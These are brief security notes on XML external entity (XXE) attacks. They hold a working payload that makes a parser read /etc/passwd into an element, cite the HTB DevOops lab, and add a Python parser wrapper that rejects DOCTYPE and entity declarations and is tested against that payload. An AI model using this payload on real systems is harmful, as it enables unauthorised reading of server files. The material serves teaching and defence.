XML Exploitation

XXE

Declare the filevar entity in the DOCTYPE, then reference it as &filevar; inside an XML element so that the parser expands it and the file's data is displayed in that element.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [ <!ENTITY filevar SYSTEM "/etc/passwd"> ]>
<note>
<Author>Jeo</Author>
<Subject>Testing</Subject>
<Content>&filevar;</Content>
</note>

Usage ref: HTB DevOops
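
Defensive counterpart, as an added example that is not part of the original notes: a Python parser wrapper that rejects any document carrying a DOCTYPE or entity declaration before the application sees it, shown against the payload above. The names safe_parse, is_rejected and ForbiddenXML and the BENIGN_DOC sample are assumptions made for this illustration.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class ForbiddenXML(ValueError):
    """Raised when a document uses DTD features the application never needs."""


def safe_parse(xml_bytes):
    """Parse untrusted XML, refusing DOCTYPE and entity declarations first."""
    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        raise ForbiddenXML(f"DOCTYPE declaration not allowed: {name}")

    def forbid_entity(name, is_param, value, base, sysid, pubid, notation):
        raise ForbiddenXML(f"entity declaration not allowed: {name}")

    def forbid_external(context, base, sysid, pubid):
        raise ForbiddenXML(f"external entity reference not allowed: {sysid}")

    # First pass: a bare expat parser whose DTD handlers abort the parse.
    checker = xml.parsers.expat.ParserCreate()
    checker.StartDoctypeDeclHandler = forbid_doctype
    checker.EntityDeclHandler = forbid_entity
    checker.ExternalEntityRefHandler = forbid_external
    checker.Parse(xml_bytes, True)
    # Second pass: build the tree only for documents that passed the check.
    return ET.fromstring(xml_bytes)


def is_rejected(xml_bytes):
    """Return True when safe_parse refuses the document."""
    try:
        safe_parse(xml_bytes)
    except ForbiddenXML:
        return True
    return False


# The payload from the notes above, then a constructed note without a DTD.
XXE_DOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [ <!ENTITY filevar SYSTEM "/etc/passwd"> ]>
<note><Author>Jeo</Author><Subject>Testing</Subject>
<Content>&filevar;</Content></note>"""
BENIGN_DOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<note><Author>Jeo</Author><Subject>Testing</Subject>
<Content>hello</Content></note>"""

if __name__ == "__main__":
    print("XXE payload rejected:", is_rejected(XXE_DOC))
    print("benign content:", safe_parse(BENIGN_DOC).findtext("Content"))
```

Rejecting the DOCTYPE outright is stricter than disabling external entity resolution alone, so it suits endpoints whose legitimate input never carries a DTD.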